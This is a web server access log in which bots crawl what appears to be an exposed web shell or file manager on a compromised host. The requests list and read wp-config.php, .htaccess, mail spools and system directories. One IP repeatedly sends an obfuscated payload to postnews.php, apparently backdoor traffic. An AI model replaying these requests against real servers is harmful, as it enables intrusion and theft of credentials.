216.73.216.53 - - [03/Nov/2025:05:54:43 +1000] "GET /1111397792?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fpostnews.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:54:43 +1000] "GET /1461104?fileloc=//usr/lib/sendmail.sendmail&path=//usr/lib HTTP/1.0" 200 1316833 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:54:46 +1000] "GET /1111008720?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fisdnezmf.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 39508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:54:49 +1000] "GET /1111274320?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2FALFA_DATA HTTP/1.0" 200 17518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:54:51 +1000] "GET /1139712?path=//etc/xdg HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:54:52 +1000] "GET /1110947808?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fpostnews.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:54:55 +1000] "GET /1110903872?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fyrhaeltb.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 31631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:54:58 +1000] "GET /1110941392?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fisdnezmf.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 39508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:54:58 +1000] "GET /1042736?path=//var/ftp HTTP/1.0" 200 16737 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:55:01 +1000] "GET /1111021776?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2FALFA_DATA HTTP/1.0" 200 17518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:55:04 +1000] "GET /1110957856?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2FALFA_DATA HTTP/1.0" 200 17518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:05:52:12 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131363733322p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323131333133322q3634393662626339393162356133616564613564613137613734333839366139222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:05:55:06 +1000] "GET /1351712?path=//etc/mail HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:55:07 +1000] "GET /1111248880?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fpostnews.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.75.72 - - [03/Nov/2025:05:55:06 +1000] "GET /?124297456?shopdetail=0124151726 HTTP/1.0" 200 202681 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [03/Nov/2025:05:55:10 +1000] "GET /1110905136?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2FALFA_DATA HTTP/1.0" 200 17518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:55:12 +1000] "GET /1041472?path=//etc/exim HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:55:13 +1000] "GET /1111511424?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2FALFA_DATA HTTP/1.0" 200 17518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.38.147.90 - - [03/Nov/2025:05:55:15 +1000] "GET /1497780512?path=/home/region-gk.ru/data/www/new.region-gk.ru/wp-includes HTTP/1.0" 200 458675 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.53 - - [03/Nov/2025:05:55:16 +1000] "GET /1110950560?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fyrhaeltb.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 31631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:55:21 +1000] "GET /1400736?fileloc=//var/mail/coffeeprosto_usr&path=//var/mail HTTP/1.0" 200 12319 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:55:22 +1000] "GET /763901472?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-config-sample.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16271 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:55:24 +1000] "GET /763332928?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-config-sample.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16271 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:55:28 +1000] "GET /1427728?path=//etc/exim HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:05:52:36 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131363735362p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323131333135362q3638373262646331633637316132396239343833326239656633393465323562222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:05:55:30 +1000] "GET /763783760?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-cron.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.75.71 - - [03/Nov/2025:05:55:29 +1000] "GET /listing/127830272 HTTP/1.0" 200 201622 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [03/Nov/2025:05:55:33 +1000] "GET /763617056?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fdelpaths.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 12802 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:55:35 +1000] "GET /1461104?path=//usr/lib/kdump HTTP/1.0" 200 15678 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:55:36 +1000] "GET /764063088?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-config-sample.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16271 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:55:39 +1000] "GET /763901472?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-cron.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:55:42 +1000] "GET /763617056?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-config.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16381 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:55:42 +1000] "GET /1523216?path=//var/log HTTP/1.0" 200 141084 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:55:45 +1000] "GET /763332928?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-cron.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:55:48 +1000] "GET /763617056?path=%2Fhome HTTP/1.0" 200 99139 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:05:53:00 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131363738302p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323131333138302q3435616130383336396330303564636533636164393133633264303964303662222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:05:55:51 +1000] "GET /1073904?path=//usr/lib HTTP/1.0" 200 57609 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.75.70 - - [03/Nov/2025:05:55:50 +1000] "GET /1360761824?shopdetail=1359158001 HTTP/1.0" 200 201553 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [03/Nov/2025:05:55:54 +1000] "GET /763862592?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-links-opml.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 15612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:55:57 +1000] "GET /763858048?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-config.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16381 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:55:59 +1000] "GET /1361856?path=//run/sudo HTTP/1.0" 200 12721 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:56:00 +1000] "GET /763657072?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fdelpaths.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 12802 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:56:03 +1000] "GET /763617056?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fxmlrpc.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:56:06 +1000] "GET /764063088?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-cron.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:56:09 +1000] "GET /763988464?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww HTTP/1.0" 200 17137 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:56:10 +1000] "GET /1299776?path=//lib/udev HTTP/1.0" 200 33719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:56:12 +1000] "GET /763892304?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-blog-header.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 13092 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:05:53:23 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131363830332p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323131333230332q6338633537323961383032393665386661376533623237373135316239626266222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:05:56:15 +1000] "GET /763651856?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Finputs.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 12750 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:56:17 +1000] "GET /1057248?path=//etc/mail HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.244.226.114 - - [03/Nov/2025:05:56:19 +1000] "GET /1497780512?path=/home/region-gk.ru/data/www/new.region-gk.ru/images HTTP/1.0" 200 17611 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [03/Nov/2025:05:56:23 +1000] "GET /1328608?path=//run/udev HTTP/1.0" 200 19272 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:56:26 +1000] "GET /1111549104?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.tmb HTTP/1.0" 200 14558 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:56:29 +1000] "GET /1110848112?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F610942 HTTP/1.0" 200 23887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:56:30 +1000] "GET /1457504?path=//opt/zend HTTP/1.0" 200 28837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:56:32 +1000] "GET /1111432592?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fimages HTTP/1.0" 200 17611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:56:35 +1000] "GET /1110813856?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fimages HTTP/1.0" 200 17611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:56:38 +1000] "GET /1111495616?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F610942 HTTP/1.0" 200 23887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:05:53:46 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131363832362p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323131333232362q3736613962663339393663303036386361656665653265316331663134313838222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:05:56:38 +1000] "GET /1544240?path=//opt/zend HTTP/1.0" 200 28837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:56:41 +1000] "GET /1111046928?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fgoogle8c847950a0446b02.html&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 12617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.76.165 - - [03/Nov/2025:05:56:39 +1000] "GET /120509920?shopdetail=0120368657 HTTP/1.0" 200 202677 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [03/Nov/2025:05:56:44 +1000] "GET /1110870464?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F610942 HTTP/1.0" 200 23887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:56:47 +1000] "GET /1111008720?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.htaccess&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 14647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:56:50 +1000] "GET /1254864?path=//etc/rpm HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:56:50 +1000] "GET /1111534496?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F610942 HTTP/1.0" 200 23887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:56:53 +1000] "GET /1111377776?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F610942 HTTP/1.0" 200 23887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.76.164 - - [03/Nov/2025:05:56:52 +1000] "GET /14924800?shopdetail=0014908047 HTTP/1.0" 200 206113 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [03/Nov/2025:05:56:56 +1000] "GET /1110957200?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F610942 HTTP/1.0" 200 23887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:56:58 +1000] "GET /1277088?path=//opt/zend HTTP/1.0" 200 28837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:56:59 +1000] "GET /1111345856?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.htaccess&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 14647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:57:02 +1000] "GET /1111526688?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fgoogle8c847950a0446b02.html&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 12617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:05:54:11 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131363835312p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323131333235312q3235363663343933353432353265336365353832333933326464613964336635222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:05:57:05 +1000] "GET /1111204064?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.tmb HTTP/1.0" 200 14558 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.76.164 - - [03/Nov/2025:05:57:03 +1000] "GET /16452224?shopdetail=0016433671 HTTP/1.0" 200 200905 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.14 - - [03/Nov/2025:05:57:04 +1000] "GET /1559344?path=//usr/sbin HTTP/1.0" 200 655955 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:57:08 +1000] "GET /1111322496?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.htaccess&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 14647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:57:11 +1000] "GET /1110941392?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.htaccess&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 14647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
